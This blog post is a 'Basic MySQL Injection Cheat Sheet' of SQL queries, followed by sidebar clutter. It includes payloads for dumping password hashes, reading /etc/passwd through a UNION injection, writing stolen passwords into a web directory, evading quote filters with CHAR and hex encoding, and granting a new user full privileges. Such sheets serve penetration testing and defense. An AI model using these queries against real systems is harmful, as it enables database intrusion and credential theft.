Basic MySQL Injection Cheat Sheet

By SecaGuy On 8 March 2012 · Leave a Comment

Version

SELECT @@version;

Comments

SELECT 1; #comment
SELECT /*comment*/1;

Current User

SELECT user();
SELECT system_user();

List Users

SELECT user FROM mysql.user;

List Password Hashes

SELECT host, user, password FROM mysql.user;

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;

List privileges for the user on column:

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';

Current Database

SELECT database();

List Databases

SELECT schema_name FROM information_schema.schemata;

SELECT DISTINCT(db) FROM mysql.db;

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

Select Nth Row

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered 1

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered 2

Select Nth Char

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2

SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT CHAR(65); # returns A

Char -> ASCII Value

SELECT ASCII('A'); # returns 65

Casting

SELECT CAST('1' AS unsigned integer); # returns 1

SELECT CAST('123' AS char); # returns 123

String Concatenation

SELECT CONCAT('A','B'); # returns AB

SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT IF(1=1,'foo','bar'); # returns 'foo'

SELECT IF(1=2,'foo','bar'); # returns 'bar

Case Statement

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

SELECT CASE WHEN (1=2) THEN 'A' ELSE 'B' END; # returns B

Avoiding Quotes

SELECT 0x414243; # returns ABC using hexadecimal

Time Delay

SELECT BENCHMARK(1000000,MD5('A'));

Local File Access

...' UNION ALL SELECT LOAD_FILE('/etc/passwd')

SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Create Users

CREATE USER test1 IDENTIFIED BY 'pass1';

Delete Users

DROP USER test1;

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO test1@'%';

Location of DB files

SELECT @@datadir;

Write query result into file

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt';

Write query result into file without single quotes

SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(114),CHAR(111),CHAR(111),CHAR(116),CHAR(39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(47),CHAR(116),CHAR(109),CHAR(112),CHAR(47),CHAR(112),CHAR(97),CHAR(115),CHAR(115),CHAR(101),CHAR(115),CHAR(46),CHAR(116),CHAR(120),CHAR(116),CHAR(39));

Above query is equal to:

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/tmp/passes.txt';

Get Shareaholic

M	T	W	T	F	S	S
« Feb				Apr »
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Basic MySQL Injection Cheat Sheet

Leave a Reply Cancel reply

Subscribe via Email

Recent Posts

Categories

Sci/Tech – Google News

Meta

Calendar

Basic MySQL Injection Cheat Sheet

Related Posts

Leave a Reply Cancel reply

Subscribe via Email

Recent Posts

Categories

Sci/Tech – Google News

Meta

Calendar